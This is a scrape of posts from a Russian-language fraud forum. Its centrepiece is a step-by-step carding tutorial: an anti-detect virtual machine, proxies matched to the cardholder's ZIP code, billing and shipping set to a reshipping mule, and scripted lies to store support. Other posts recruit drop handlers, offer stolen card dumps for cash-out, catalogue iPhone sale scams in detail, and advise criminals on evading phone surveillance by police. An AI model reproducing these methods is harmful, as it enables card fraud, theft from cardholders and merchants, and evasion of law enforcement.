1 баллМы предлагаем размещение баннерной или любой другой рекламы на площадке Рекламные места на площадке 1. Баннер 468*60, ротатор в «шапке» форума (отображается на всех страницах форума)-40$ месяц 2. Баннер 728*90, ротатор в верху страницы (отображается на всех страницах форума) -60$ месяц 3. Баннер 468*60, верх страницы (отображается на всех страницах форума) -20$ месяц 4. Баннер 728*90 или 468*60 на всех страницах сайта либо внутри раздела (на выбор) - 40$ месяц 5.Баннер 1000*60 на всех страницах сайта либо внутри раздела (на выбор) - 50$ 6. Закреп темы - 15$ Цены при отрисовки баннеров нами от 10 до 15 $ При закрепе сторонних баннеров цена обсуждается отдельно! Реклама на канале телеграмма : В общем посте 2т.р Отдельным постом 5т.р По всем вопросам касающимся приобретения рекламы, а также по другим вопросам обращайтесь в личные сообщения администрация не несет ответственность за предлагаемые товары или услуги. Контакт для связи : https://t.me/MarviherAdmin
-
1 баллА в чем смысл схемы то? про манинг уже давно всем все известно!
-
1 баллРешил оставить отзыв, ТС дружелюбный , сопровождал до получения товара , привез курьер , доставка бесплатно обошлась , уломал ТСа Спасибо вообщем!
-
1 балл
-
1 баллФорма обращения к Гаранту 1) Ники участников сделки 2) Предмет сделки 3) Сумма сделки 4) Условия успешного завершения сделки 5) В какой платежной системе принимает деньги продавец 6) Кто оплачивает процент Гаранта
-
1 баллСпособ 1. Продажа iPhone по предоплате. Это – самый распространенный способ жульничества. Возможно, вы даже о нем читали. Но мошенники в последнее время стали хитрее. Находчивые черные дельцы прописывают в объявление условия покупки: “без предоплаты”, “самовывоз”, “оплата после проверки на работоспособность”, “без карт Кукуруза” и даже покупают статус «Магазин» на Авито за 40000 рублей в год. Схема продажи выглядит надежно даже для подозрительного парня, и вы звоните. На том проводе уверенный компетентный менеджер рассказывает о плюсах и минусах интересующей вас модели, консультирует по возникающим вопросам, принимает заказ, узнает о необходимости дополнительных аксессуаров (защитный чехол, автомобильное зарядное устройство и т.д.). Все, как в приличных магазинах. Потом вам обещают доставку в течение двух часов, оплату после полной проверки аппарата и даже художественное обрезание симкарты. После этого следует хитрый финт ушами. Менеджер объясняет, что в связи с участившимися попытками грабежей курьеров и оплат фальшивыми деньгами, за iPhone надо будет заплатить через пополнение вами собственного лицевого счета, а чек с кодом протекции, без которого они якобы не смогут снять ваши деньги, необходимо вручить курьеру. Когда подойдете к терминалу Qiwi, «Элекснет» или любому другому, вы созваниваетесь с менеджером, и он вам объясняет, что необходимо зайти в один из кошельков и ввести ваш номер договора. «Так, готовы? Вводите! Девять ноль три пять пять один один два один семь» (9035511217, т.е. обычный номер телефона), «теперь внесите полную сумму оплаты». Что происходит дальше — догадайтесь сами. Так же помимо терминалов мошенники лихо использую «Евросеть» с ее картой «Кукуруза», «Связной» и даже Сбербанк, оформляя карты на подставные лица. «А как же самовывоз?», — спросите вы. Да нормально все! «Офис закрыт на ремонт в ближайшие 3 дня” или, как вариант, “Находится по адресу: Михнево, улица Гоголя, дом 17, прямо напротив Сбербанка” или “У нас очень большие очереди, отстоите 2-4 часа”. После этого вам предложат схему с курьером – и дальше по описанному рецепту. Способ 2. Крупный интернет-магазин продает iPhone с большой скидкой по предоплате. К сожалению, предоплатой в корыстных целях пользуются даже зарекомендовавшие себя годами известные магазины. Происходит это так. Объявляется уберскидка в 50%, но по 100-процентной предоплате и доставкой через три недели. Известность магазина и низкая цена за аппарат подталкивает людей выстраиваться в очереди, чтобы отдать свои деньги. Происходит передача средств в офисе, вам дают полный пакет документов – чеки, договор, все чинно и благородно. Когда через три недели звоните уточнить, можно ли забрать свой телефончик, вам объясняют, что в связи с очень высоким количеством оформленных заказов компания не справляется с поставкой таких объемов, не укладывается в срок и переносит ваш заказ еще на 2-3 недели. Это позволяют условия договора, который вы, скорее всего, читали не очень внимательно. Спустя 2-3 недели история повторяется, но может меняться причина задержки. Теоретически, можно начать процедуру возврата денег, но вам говорят, что iPhone уже близко, и надо подождать совсем чуть-чуть. Ну прямо вот капельку. Одни поддаются на уговоры, другие нет. История продолжается, пока у покупателя не иссякнет терпение. Но даже если он сразу идет оформлять отказ, то узнает, что по условиям договора (кто читает эти договора?) денежные средства будут возвращены в течение месяца, причем в некоторых случаях, с удержанием определенной комиссии. В самых же веселых случаях приходится подавать суд и ждать банкротства компании. С непредсказуемым результатом. Давайте посчитаем. К примеру, BigBazzy в 2012 году, запустив акцию “iPhone 4s со скидкой 51% за 19990 рублей”, собрала более 50 000 заказов на сумму приближающуюся к 1 миллиарду рублей. Компания использовала эти деньги 3-5 месяцев. Возможно, собранное просто лежало под проценты в банке, возможно — использовалось для закупки товаров и рекламы. Это уже не очень важно. Но покрутить около полугода миллиард рублей – это очень, очень приятно. Кому-то из «покупателей» повезло, и они успели вернуть свои деньги, а кто-то дожидается своего заказа и по сей день. Способ 3. Продажа «восстановленных» iPhone под видом новых. Часто в описании айфонов встречаются слова refurbished, ref или просто «реф». Некоторые продавцы просто пишут это, не объясняя, что за обозначение такое, а некоторые магазины уверяют в тотальной новизне. Мол, аппарат совершенно новый, запечатанный и т.д. Для тех, кто еще не знает, что такое «реф», объясню. Продавцы будут рассказывать об iPhone, которые вернули недовольные покупатели прямо в Apple Store, их отправили на завод, внимательно протестировали, заново упаковали и теперь продают с большой скидкой. На самом же деле все чуть печальнее. В российских условиях «реф» — это iPhone с китайскими запчастями низкого качества. Китайское там все — экран, динамик, микрофон, шлейфы, антена, болты и т.д. Все, кроме материнской платы, чтобы операционная система стояла оригинальная. Процент брака у таких шедевров стремится к 100 процентам. Обычно до ремонта они живут пару месяцев. Продаются «рефы» повсеместно, но по объявлениям от частников их особенно много. Способ 4. Продажа китайской подделки iPhone под видом оригинального. Если вы думаете, что сможете легко отличить китайскую копию iPhone на Android от оригинала, я вас сильно разочарую. Мастерство копирования выросло настолько, что даже при довольно вдумчивом разглядывании разницу заметить трудно. Ну разве что положить рядом настоящий аппарат и тыкать во все пункты меню. Это безобразие часто продают под видом оригинального iPhone, а для пущей убедительности прикладывают чек из «Евросети» или «Связного». История рассказывается стандартная: подарили на день рождения две штуки, продаю лишний с большой скидкой, нужны деньги очень. «Купленный» в «Евросети» за 26990 рублей iPhone 5S отдадут вам всего за 9000, а в процессе диалога скинут еще пару тысяч. Мол, трубы горят, очень нужно потушить пожар. Чек печатают на кассовом принтере, который есть во всех барах и ресторанах. Можно и свой купить — стоит он от 2000 рублей. Накладную сооружают на обычном принтере. Печати, как вы знаете, можно заказать по оттиску почти в любой профильной компании. С доставкой на дом одна печать обойдется в 500 рублей, и это с доставкой на дом. Способ 5. Продажа макета iPhone под видом настоящего. Для кого-то это не секрет, а кто-то об этом узнает сейчас в первый раз. Если видите в витрине магазина или точки на радиорынке груду продуктов Apple – это не настоящие устройства, а их муляжи. Во-первых, выкладывать оригиналы небезопасно. Во-вторых, слишком дорого. Замечу, точно так же поступают и за бугром. Но существует другая категория граждан, которая использует эти муляжи в корыстных целях. Давайте посчитаем затраты. Коробка-муляж — 300 рублей, муляж айфона — 900 рублей, набор китайских аксессуаров 150 рублей, транспортировочные пленки 50 рублей, запечатать iPhone в пленочку — 50 рублей. Выставить объявление на доске объявлений — бесплатно. Итого получается 1450 рублей. Чтобы продать побыстрее, цену ставят низкую, например, 19000 рублей. А активе 17550 рублей и слегка испорченная карма. Правда, муляж весит намного меньше оригинала, и изредка его подгоняют по весу. Спросите, как можно перепутать муляж с нормальным аппаратом? Так ведь пленочка же на месте! Сразу видно, что новьё. Поэтому можно даже не вскрывать до дома. Или же продавец сам благоговейно разрежет пленочку и покажет, что внутри все новенькое. Вы не представляете, как часто подобное срабатывает. Способ 6. Продажа неисправного iPhone. Схема похожая на предыдущую, только чуть более затратная для мошенника. Аппарат, прилично выглядящий снаружи, но на деле мертвый, обклеивается транспортировочными пленками, а коробка запечатывается в заводскую пленку. Дается объявление о продаже задешево – и понеслась. Способ 7. Заблокированный под оператора iPhone. Купленный в Америке с контрактом за $200 аппарат распечатывают, наклеивают на заднюю часть коробки нижнюю наклейку с данными аппарата, к примеру, из Германии, запечатывают коробку в заводскую пленку и выставляют на продажу за 19000 руб. Если вы купили такое чудо, есть вероятность наткнуться на мошенников еще раз, только уже других. В поисках способа разблокировать iPhone вы найдете массу сайтов, которые за скромный гонорар от $15 до $90 «отвяжут» его от оператора любой страны. Естественно, по предоплате. Ну вы поняли. Способ 8. Грабеж покупателя. Совсем отмороженные особи выставляют новый iPhone 5S с 64 гигами памяти тысяч за двенадцать рублей. Но могут встретиться только вечером после работы, в районе Выхино в 22:00. Цель простая — застать жертву в нужном месте в нужное время с наличными в приличных количествах. И снова вы не поверите – сколько любителей халявы готовы ехать за дешевым айфоном ночью в Выхино… Способ 9. Фальшивые SMS. Покупатель находит объявление о продаже айфона задешево и без предоплаты. К сожалению, продавец находится в самом дальнем регионе РФ (эти знаменитые чукотские айфоны!), но отправляет заказы через DHL. Покупатель делает заказ, оставляя адрес доставки, номер телефона и ФИО. Спустя 3-5 дней на ваш номер приходит SMS. Отправителем указана DHL, а внутри текст, что на ваше имя поступила посылка с iPhone 6, для получения необходимо указать номер отправления. Вы связываетесь с продавцом, и он просит произвести оплату, после чего сообщит номер отправления. Так как в DHL без номера отправления вам не могут предоставить никакую информацию, многие на это ведутся. А SMS на самом деле была отправлена злоумышленником. Способ 10. Продажа iPhone с включенной функцией Найти iPhone и активным Apple ID. Первые умники с подобными махинациями появились относительно недавно, 9-10 месяцев назад. С выходом iOS 7 появилась возможность удалено блокировать аппарат через свой Apple ID в случаях, когда его украли или потеряли. Разблокировать такой аппарат невозможно, но при этом легко отслеживается его местонахождение на карте. В итоге развод выглядит так. Доверчивый покупатель покупает подержанный аппарат, а через день на него приходит сообщение «Этот телефон был украден. Я знаю ваше месторасположение. Позвоните на номер…и верните iPhone, или я пишу заявление в полицию». После этого аппарат блокируется. Помимо месторасположения становится известен и номер телефона жертвы. В 95% случаев такой аппарат возвращается хозяину, а через день он снова выставляется на продажу. И так до бесконечности. Если потенциальная жертва не возвращает телефон, пишется заявление в полицию с предоставлением имеющихся данных, после чего телефон конфискуется. По этой же схеме могут заблокировать ваш личный iPhone, угнав вашу почту и попросив выкуп в размере 500-3000 рублей. Еще, говорят, фотографии могут стащить. Способ 11. Продажа оригинального iPhone с дальнейшей подменой на копию или макет. В данном методе название говорит само за себя. С вами встречается продавец, вы проверяете действительно оригинальный новый аппарат, но в какой-то момент злоумышленник меняет его на подделку. Небольшая ловкость рук, зато сколько впечатлений. Способ 12. Продажа заведомо бракованных iPhone. Данный способ часто практикуется на Яндекс Маркете. В поисках дешевого варианты вы натыкаетесь на магазин c более чем 1000 отзывов и 5 звездами. Не читая отзывы (ведь пяти звезд достаточно), вы оформляете заказ и ждете доставку. Приезжает курьер, и в дверях вручает вам айфон и документы на подпись. Скороговоркой озвучивает, что гарантия один год, возврат-замена в течение 14 дней, просит расписаться и удаляется. Обнаружив брак, вы связываетесь с магазином на предмет возврата, вам диктуют номер службы поддержки, которая различными способами компостирует мозг (пришлите номер заказа, подождите два дня. Теперь пришлите копию чека и подождите еще два дня. Теперь нам нужна фотография неисправности — и так до бесконечности). Номер часто занят и не отвечает, на почту реагируют долго или не реагируют вообще. Решив написать отзыв на Яндекс.Маркете, вы с ужасом выясняете, что подобных уже навалом, но между ними красуется масса однотипных положительных, многие из которых куплены по 20 рублей за штуку. От выше изложенных способов мошенничества страдают преимущественно покупатели. Но и продавцы техники Apple нередко становятся жертвами злодеев. Способ 13. iPhone оптом от 10 штук. Появляется объявление о продаже iPhone 6 со 128 гигабайтами на борту по цене 30000 рублей, но минимальный заказ 10-20 штук. Старожилы рынка даже не обращают внимания на такие объявления, а вот новоиспеченные бизнесмены очень даже. Вы договариваетесь о встрече (без денег), чтобы проверить — действительно ли это настоящие iPhone, а не реф, копия, муляж и т.д. И действительно оказывается, что продается оригинал, а условия сделки прозрачные: товар-деньги. Зачем это делается? Да затем, что теперь злоумышленники знают, как выглядит потенциальная жертва. В следующую встречу (или перед ней) произойдет удачная или не очень попытка грабежа. Или же условия изменятся на предоплату. В некоторых случаях находчивые дельцы сами обзванивают продавцов и интернет-магазины с предложением дешево купить iPhone. Так, к примеру, пару дней назад всем звонил один умник и предлагал «шестерки» на 128 Гбайт за $750. Когда ему сказали, что цена подозрительно низкая, он другим уже стал предлагать по $850. Быстро учатся. Способ 14. Проверка iPhone по фото и видео. С продавцом связывается покупатель из другого города, желая купить iPhone. Он сам предлагает прислать полную предоплату любым удобным способом плюс 3000 рублей на расходы по доставке. К примеру, через DHL. Но перед этим он хочет получить фото и видео с запечатанной коробкой, дабы убедиться, что он новый и не активированный. Что можно сделать с этими данными — можно только догадываться. Ниже публикую диалог и запрашиваемые злоумышленником материалы. Мой собеседник мягко послал мужчину и выложил на сайте предупреждающий материал с указанием номера телефона данного персонажа. Спустя всего пару суток по поисковому запросу с номером телефона стало приходить по 20-30 человек в день. То есть хитрому парню все же удалось получить фото и видео, и развести за счет этого десятки людей. Ю Способ 15. Грабеж продавца. Самым распространенным способом нажиться на продавце iPhone является наглый грабеж в различных его проявлениях. В магазине или у продавца заказывают несколько айфонов подороже, называют адрес доставки и ждут курьера в подъезде. Доходит даже до того, что заказ оформляет девушка с маленьким ребенком на фоне. Грабят преимущественно восточные люди и гости из очень средней Азии. Не в обиду это будет кому-то сказано, но уж так обстоят дела в 99% случаях. Что интересно, заказ всегда оформляет человек без акцента, хорошо говорящий на русском языке. Способ 16. Оплата фальшивыми деньгами. Фальшивые купюры номиналом 5000 или 1000 покупают на черном рынке за 50% от номинала, или работают на криминальные элементы по такой ставке. Далее оформляют заказ на дорогой айфон — под вечер со срочной доставкой или заранее, но с доставкой в вечернее время. При плохом освещении фальшивые деньги отличить от настоящих практически невозможно. Днем могут разыграть небольшую сценку. Продавец встречается с покупателем, уточняет полную сумму, которую надо заплатить, а потом идет – якобы – снимать деньги в ближайшем банкомате. Спустя 3 минуты возвращается с новенькими купюрами. Не самые бдительные курьеры и продавцы часто попадаются на эту удочку. Способ 17. Залом денег. Также нередко при покупке нескольких айфонов и айпадов используют залом купюр. Продавец встречается с покупателем, тот берет аппараты и передает деньги, которые продавец пересчитывает, а там не хватает, к примеру, тысячи. Злоумышленник удивляется, извиняется и просит деньги назад, чтобы пересчитать самостоятельно. Да, действительно, тысячи не хватает. Тогда жулик достает еще одну купюру в 1000 рублей и докладывает в общую пачку, но в момент пересчета он загнул примерно треть суммы. А в процессе доставания дополнительной тысячи спрятал заломленные деньги. Некоторые продавцы не перепроверяют деньги еще раз и убирают их в кошелек. С теми же, кто собирается пересчитать деньги заново, происходит следующее. Покупатель, сославшись на сильную занятость, начинает резко уходить или убегать, а продавец, не успев пересчитать деньги, оказывается перед сложным выбором, бежать вслед или считать. Оба варианта плохие. Способ 18. Удаленная покупка с целью получения данных банковской карты. Данный случай произошел с продажей на сайте Molotok. После оформления заказа продавец набрал на номер покупателя, но тот сбросил вызов и тут же написал SMS, что не может сейчас говорить, перезвонит позже. Далее последовал примерно такой диалог: — По какому вы вопросу? — Насчет покупки на «Молотке» айфона. — Да, я заказывал, скиньте номер карты для оплаты, в течение часа переведу деньги. Скидываем номер карты. Еще через несколько минут приходит новое сообщение. — Я сейчас зашел в Евросеть, но тут для пополнения вашей карты просят дату ее действия. Отправляем неверную дату… — Я сейчас перешлю 50 рублей, чтобы убедится, что я правильно ввел ваши данные. Приходит SMS приблизительно следующего содержания: “Сумма в размере 50 руб к зачислению на номер Beeline не произведена”. Прочитав только первые 5 слов из SMS, подтверждаем, что 50 рублей поступили. После этого следует попытка снять 3000 рублей. Т.е. злоумышленник, имея номер вашей карты и зная дату ее «срока годности», может переводить средства без подтверждения владельца карты. Многие думают, что без трех цифр на задней стороне карты это невозможно, и отправляют реальные данные. Спустя два дня служба поддержки сайта Molotok.ru оповещает об опасности. Способ 19. Оплата по безналу от юридического лица. С менеджером интернет-магазина связывается покупатель, желающий купить мешок айфонов по безналичному расчету, но в связи с острой необходимостью товар требуется именно сегодня (у самодура-начальника юбилей одновременно с его стервой-женой, и все это совпало с серебряной свадьбой). На объяснения менеджера, что выдача айфонов может быть осуществлена только после поступления средств на счет, покупатель предлагает лично при менеджере в офисе произвести платеж. Длительные уговоры и объяснения некоторых убеждают (слаб человек!). Перевод оформляется в присутствии менеджера, злоумышленник забирает покупку, после чего данный платеж отзывается в тот же день. Способ 20. Подмена оригинального iPhone на подделку или макет. Все как в 11-м способе, только на этот раз жертвой становится продавец. С ним связывается покупатель-мошенник с желанием купить айфончик. На встречу, как правило покупатель приходит не один. Перед оплатой мошенник хочет проверить телефон на работоспособность, в это время его подельник о чем то расспрашивает продавца. Потом покупателю что-то не нравится и он отказывается от покупки. Пара быстро уходит, унося с собой настоящий айфон, а в коробке оставляя подделку. Подводя итоги, можно понять, что самые тучные стада мошенников пасутся на разнообразных сайтах бесплатных объявлений. И все это происходит при попустительстве руководства сайтов, которое не спешит вводить защитные меры (например, для продавцов товаров с ценой выше 9000 рублей можно ввести верификацию, обозначая проверенных каким-нибудь знаком, а также возможность оставлять отзывы). Единственное, что удосужились сделать на Avito, так это писать “Не соглашайтесь на предоплату, если не уверены в надёжности продавца”, а также установить дату регистрации продавца на сайте. Впрочем, по желанию самого же продавца информацию о регистрации можно скрыть. 1) Не надо клевать на несуразно низкую цену. Чудес не бывает. 2) Оплачивайте товар наличными только по факту, после проверки устройств на работоспособность.
-
1 баллВ России спецслужбы могут прослушивать телефоны абонентов с помощью так называемой системы СОРМ (Системы технических средств для обеспечения функций оперативно-рoзыскных мероприятий). На основании закона «О связи» операторы связи обязаны предоставлять им информацию об абонентах. Но сами разговоры правоохранительным органам разрешается прослушивать только по решению суда. Впрочем, сейчас возможность прослушивать телефоны есть не только у спецслужб. Существуют специальные шпионские программы, которые устанавливаются на мобильные телефоны и позволяют другим людям, например, конкуренту или ревнивому супругу, следить за вами. Родители, которые стремятся установить полный контроль над своим ребенком, также могут пользоваться подобными программами. Какие функции есть у шпионского ПО? Установленная на мобильный телефон программа-шпион способна записывать телефонные разговоры и перехватывать смс-сообщения, а затем отправлять их на нужный адрес. Она также может копировать номера из списка контактов, передавать данные о местоположении телефона и даже дает возможность другому человеку слышать все, что происходит вокруг. Таким образом, она превращает ваш телефон в настоящий «жучок». В корпоративном телефоне может быть установлен аккумулятор со специальным чипом, благодаря которому также появляется возможность прослушивать разговоры и передавать данные. Как определить, установлена ли на телефон шпионская программа? Обычно подобное ПО никак себя не проявляет, его достаточно трудно обнаружить. Но есть определенные признаки, которые могут указывать на его наличие. 1. Телефон слишком быстро садится Признаком того, что на мобильном телефоне установлена программа-шпион, может быть слишком быстрая разрядка батарейки. Если аккумулятор телефона постоянно горячий, это тоже не очень хороший знак. Конечно, проблема может быть в самом телефоне, особенно, если ему уже больше года. Однако проверить его на наличие шпионских программ все-таки стоит. 2. Странности в работе телефона Вас также должны насторожить задержка при выключении телефона, самопроизвольная перезагрузка и включение подсветки. Выключите все лишние приложения и убедитесь,если все равно происходят страности,то смело утверждаем что это вирус. 3. Посторонние звуки в трубке Если телефон прослушивается, во время разговора с другим абонентом вы можете слышать различные посторонние звуки, шумы и даже чужие голоса.Самые банальные примеры,когда слышим эхо. 4. Помехи Поводом для беспокойства может быть и то, что телефон, лежащий рядом с аудиоколонками, создает помехи, когда вы им не пользуетесь. Это может означать, что шпионская программа вышла на связь с другим телефоном и без вашего ведома передает ему данные. 5. Соединение с абонентом устанавливается долго Если вы стали замечать, что когда вы звоните кому-либо, соединение с абонентом устанавливается долго, и точно также разъединение стало занимать больше времени, это тоже может быть признаком прослушки. Объясняется это тем, что шпионским программам необходимо некоторое время для того, чтобы «вклиниться» в разговор. Методы предохранения: Если все таки в вашем телефоне сидит вирус,установите свежий антивирус,особенно касается телефонов с системой Android.Самые популярные вирус сидят именно в них. В случае с органами,если вы в разработке,то вам не поможет ничего,но многое скроет доказательства.Обязательно имейте два телефона,первый для лички,второй для дел.Не забываем вас могут спалить по билингу,вытаскивайте батарею на рабочем в не рабочее время.А главное старайтесь говорить кодовыми словами,путайте мусоров,ведь они тоже люди,играйте на психологии у них. Запомните телефон опасная вещь,из ряд преступлений по раскрываемости в 60% палятся по нему.
-
1 баллБесплатная защита от гугла https://projectshield.withgoogle.com/public/
-
1 балл
-
1 баллО способе Заработок: от вашего старания. Затраты: 0 руб Оттенок: немного сероват. Прибыль:в день 0-1000 руб (зависит от вас) Скачать : https://yadi.sk/d/xsGpP9EPhNNCL
-
1 балл1. Настройка системы. Ставим: 1.1. Убунту - для работы самая удобная система, имхо. 1.2. Виртуалбокс. 1.3. Устанавливаем Win7 eng на виртуалбокс, все стандартно. 1.4. CCleaner - делаем "эталонную" систему, которую будем впоследствии копировать. Клинер нужен для того что бы поетерть хистори, кукизы и прочий хлам. 1.5. CCtools - генерирует ID системы, менят имя пользователя, ID процессора и прочее. Необязательна для вещевухи, но лишней не будет в любом случае. 1.6. FireFox Eng - достаточно популярный браузер среди американцев. 1.7. ProxiFier+Socks Client+VPN, если работаем с скосами от vip72. Проксифаер пропускает весь трафик через прокси, потому если сокс умирает, то трафик просто перестает поступать. Не дает засветить IP вашего VPN сервиса, в случае если сокс помрет. Все это необходимо для вашей безопасности и для того что бы система распознавала вас как рядового американца, которого мы и будем изображать на начальных этапах. 2.Поиски шопа. 2.1. Шопы ищутся различными способами. Например, путем составления правильного запроса в гугле. 2.2. На начальном этапе шопы следует проверять на pr-cy.ru Page Rank не должен превышать 4 едениц. Характеристика относительная, но в начале будет полезна. Еще один способ - парсер и проверка на Alexa Rank Сразу скажу, что вариант этот для усидчивых и для тех, у кого есть свободное время (на основной работе например), т.к. придется посещать кучу сайтов и из них уже выбирать подходящие. 1. Качаем программу http://bibyte.net/content/butterfly-40-beta-2 , эта прога для примера, лучше найти другой парсер выдачи гугла, т.к. этот слишком мало сайтов ищет. В общем запускаем прогу, в окошке вводим свой ключ (online shop например, или gift card и т.п.), предварительно выбрав поисковую систему google по usa (там всё интуитивно понятно). Справа выбираем путь, куда будет сохраняться результат. В настройках не забываем поставить галочку "удалять дубликаты url". 2. Спарсили допустим 700 сайтов этой прогой, они сохранились в текстовом документе. 3. Качаем прогу http://netpeak.ua/soft/netpeak-chec...medium=NetpeakChecker&utm_campaign=HeaderLogo после установки надо будет зарегать программу - ввести e-mail, на него придет ключ активации. 4. Запускаем Netpeak, в левом меню снимаем все галочки, оставляем только "Alexa" 5. Нажимаем верхнюю левую кнопку ("добавить" кажется, или "загрузить") и вставляем туда результат выдачи, которую спарсили прогой в первом-втором пункте. (там будут просто ссылки). 6. Снизу нажимаем то-ли "анализировать", то-ли "проверить". Там в общем тоже всё понятно. 7. После анализа в основном окне нажимаем на табличку "Alexa Rank", чтобы прога отсортировала нам сайты по показателю Alexa. Ну и заходим на все сайты подряд (2 раза тыкнуть по ссылке из окна программы). Для тех, кто не знает, что такое Alexa. Это некий рейтинг - показатель посещаемости сайта. Чем он ниже (чем меньше цирфа) - тем круче и тем бОльшую сайт имеет посещаемость. Соответственно заходим на сайты с самым большим рейтингом Alexa и по убыванию. Оговорюсь, что Alexa рейтинг присваевается именно для сайтов одной и той-же тематики. Например, сайт интернет магазина с рейтингом 1кк будет иметь меньшую посещаемость, чем сайт интернет магазина с рейтингом 500к, но не факт, что он будет иметь меньшую посещаемость, чем сайт автомобильной тематики с рейтингом 500к. В общем надо понять, что рейтинг присваивается именно сайтам одной, схожей тематики. PS. Даже при конкретном ключе (когда парсим), например "online shop", в выдаче будет куча совсем левых сайтов. Именно поэтому придется много сайтов посещать и делать отбор. 3. Подбор материала. 3.1 Вырабатывается с опытом. Поиск нужных бинов для каждого мерча. В большинство шопов лезут европейские карты. Но лучше уточнять. Сочинить легенду, например вы хотите сделать подарок другу/жене/мужу или еще что-нибудь. И врите красиво! 4.Способы вбива. 4.1 Гифты. Самый удобный способ. Настраиваем систему под холдера карты, в шопе оформляем покупку на данные с СС. Сокс берем как можно ближе к холдеру. Затем, если нам выслали гифт, оформляем на него покупку, указывая данные посредника. 4.2Прямой вбив - имя указываем того, кто будет принимать товар. Билинг адрес берем с карты, шипинг - адрес посредника. Необходим прозвон, общение с саппортом. Сокс берем как можно ближе к холдеру. 4.3 Энролл. Самы сложный, но самый результативный метод. Необходим для жирных шопов. В настоящее время найти незароленную карту довольно непросто, а процедура реэнрола достаточно сложна. 5.0 Работаем с EU картоном. Схемы работы : Вариант 1. Шоп дает нам выставить реальный BILLING ADDRESS держателя карты. В таком случае мы выставляем BILLING ADDRESS с карты, в SHIPPING ADDRESS ставим адрес посредника. Имена ставим все с посредника. SOCKS 5 ставим под BILLING ADDRESS. Советую начинать с прелюдий. Если есть live-chat(support) то пишем туда, если его нету - то на почту. История простая : Вы нашли товар,которого нету у вас в стране и хотите купить его у них. При этом спрашивайте за интернациональную доставку(они откажут) и в том же сообщении спрашивайте возможность альтернативной доставки на посредника в США. Обязательно пишите уважительно, указывая заранее свой ИМЯ, чтобы будущий заказ они сразу ассоциировали с вами. Работает на УРА со средней руки шопами Вариант 2. Шоп не дает нам выставить реальный BILLING ADDRESS держателя карты. В таком случае мы выставляем BILLING ADDRESS с посредника, и SHIPPING ADDRESS соответственно так же с посредника. SOCSK 5 под BILLING ADDRESS(посредник) Советую начинать с прелюдий. Если есть live-chat(support) то пишем туда, если его нету - то на почту. История простая : Вы сейчас находитесь в командировке в Штатах и хотели бы сделать заказ. Сами вы из ***** и карта выпущена там же. Уже очень много магазинов отказало, а я ищу подарок своему партнеру(другу, брату, подруге, девушке). Работает на УРА со средней руки шопами Материал у которого сверяется BILLING ADDRESS : MX/BR/USA/Canada/NZ/AU/UK/HK/ 6.0 Рассмотрим вбив в шоп, на примере последнего заказа - лодочного радара. Жмем правой кнопкой на "эталонную" систему, выбираем копировать. Ставим галку напротив "генерировать новые мак адреса", выбираем "связную копию". Запускаем скопированную систему, с которой и будем работать. После загрузки Win запускаем CCTools, генерируем и сохраняем нужные ID, запускаем впн, подбираем нужный сокс. Чекаем сокс на блек лист у брофмана или масимы. Если прокси скор равен нулю - выбираем карту в магазине. Желательно что бы ZIP код на карте и ZIP сокса совпадали или были как можно ближе. Узнать ZIP сокса можно на сайте whoer.net Тут же проверяем систему на соответстиве выбранному часовому поясу. Делаем корректировки системы (таймзона, время), обновляем страницу и добиваемся полного совпадения. Ищем магазин, используя правильные поисковые запросы и спец.символы. Заходим в гугл, пишем "buy+shop+marine radar+intext:"we accept credit cards"+site:.com" Данный поисковый запрос выдаст нам сайты в com зоне, которые предлагает купить лодочный радар и поддерживает нужные нам методы оплаты - кредитные карты. Выбираем нужный нам сайт, смотрим наличие нужного товара, проверяем pr. Если нас все устраивает - ищем способ связаться с саппортом. Идеальный вариант - онлайн чат. Выбираем нужный способ вбива. Я выбрал юса картон. Пишем в саппорт что-то типа "Hello there. I have some questions about marine radar." И ждем ответа от саппорта. Они спросят что именно вам непонятно. Можно задать пару вопросов по поводу товара, а затем перейти к тому что нас интересует - отсылают ли они на отличный от биллинга адрес и едят ли еврокартон(если вы решили бить именно им). Поскольку я выбрал юса картон - меня интересует отсылка товара на отличный от биллинга адрес. После общения и утвердительного ответа на вопрос "can you ship radar to my warehouse facility?" или куда там вам нужно слать, согласно вашей легенде, благодарим саппорт и идем в раздел чекаута. Выбираем нужный способ доставки, заполняем биллинг адрес с карты, вписывая ФИО ПОСРЕДНИКА. Заполняем шиппинг адрес - куда будем слать товар. ФИО ставим так же ПОСРЕДНИКА. Жмем пэй или плейс ордер и если баланса на карте достаточно - получаем номер ордера. Затем ждем 2-3 часа и связываемся с саппортом по поводу того, когда наш товар будет отправлен. Можно прозвонить, можно через онлайн чат. Нам говорят дату и мы ждем трек. 7.0 Макеты общения с саппортом. 1. Предположим, у нас история такая. Мы - владельцы яхты, на которую нужно отправить тот же радар. Соответственно, отпралять его нужно не нам домой, а туда где стоит яхта. Пишем на e-mail или в online chat. Можно так же прозвонить самим, если разговорный английский на уровне, но луче не рисковать и заказать прозвон у специалистов. "Hello. I need marine radar for my boat. But it should be shipped to my warehouse facility, not to my house. Can you shipped it there?" Перевод следующий: "Здравствуйте, Мне нужен лодочный радар для моей лодки. Но отправить его нужно на склад, а не мне домой. Можете ли вы выслать его туда?" Напрягаем фантазию, включаем мозги и сочиняем любые истории, которые нам нравятся. Если с английским сложности - всегда есть гугл транслейты, но в этом случае нужно писать простыми предложениями ибо он их переводит криво. 2. Мы - хотим сделать подарок сестре. Пусть у нее будет день рождения. Способы общения - те же. "Hi. I'd like to make a present for my sister. She's 30 next week. I'd like to send a gift. What's about dress? Can you shipped it to my sister?" Перевод следующий. "Привет. Я хотел бы сделать подарок своей сестре. Ей будет 30 на следующей неделе. Как насчет платья? Можете отправить его моей сестре?" И так далее. Не зацикливайтесь на одном макете. Постоянно дополняйте деталями - выглядит более правдоподобно.
-
1 балл
-
1 баллАктуально ли будет? Удобно?-будут ли пользоваться им. Или уже много актуальных? Конечно для начала пройду проверку администрации, если решу, что буду этим заниматься. Есть куча синяков и не только ( так же есть простые, готовые работать дропами, чурок не убдет и барыг-они в 75% кидают и сливаются). Какие цены ставить? будут ли люди соглашаться за товар?-например пак 5айфонов 2фотика или еще что-то подобное, можно ли за это взять айфон? или как быть? видел норм дроп сервисы берут за пак не больше 5-10кг 150 баксов в среднем. Адекватная ли цена? Трудно ли это будет?-отпишитесь дроповоды, буду благодарен
-
1 балл
-
1 баллСомневаюсь, чтоб у них на такие случаи был чёрный список! Недавно микроволновку там же купил- работает пока
-
1 баллДам дампы на обнал. Выборку сделаю по Вашим бинам ) Дампы БЕЗ пинов. 60% Вам!!! , Прошу стучять толька Проверенным людям Аська или в пм
-
